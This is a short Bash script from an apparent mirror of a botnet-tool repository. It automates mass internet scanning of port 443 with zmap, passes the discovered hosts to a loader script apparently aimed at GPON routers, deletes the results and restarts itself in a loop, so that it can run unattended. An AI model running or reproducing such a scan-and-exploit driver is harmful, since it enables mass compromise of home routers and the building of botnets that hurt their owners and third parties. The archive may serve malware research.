6
0
mirror of https://github.com/threatland/TL-BOTS synced 2024-06-28 18:01:53 +00:00
TL-BOTS/TL.EXPLOIT_SCAN/SCANNER.GPON/gpon2.6b4eac.sh
2019-10-02 16:41:26 -04:00

12 lines
225 B
Bash

#!/bin/bash
#!Created By Swizz
#!Just start the scanner and go to the movies =)
clear
echo -e "\e[1;32mNow Auto-Scanning GPON"
zmap -p443 -wg.lst -og.txt
ulimit -n 999999
python gloader.py g.txt
rm -rf g.txt
clear
sh gpon.sh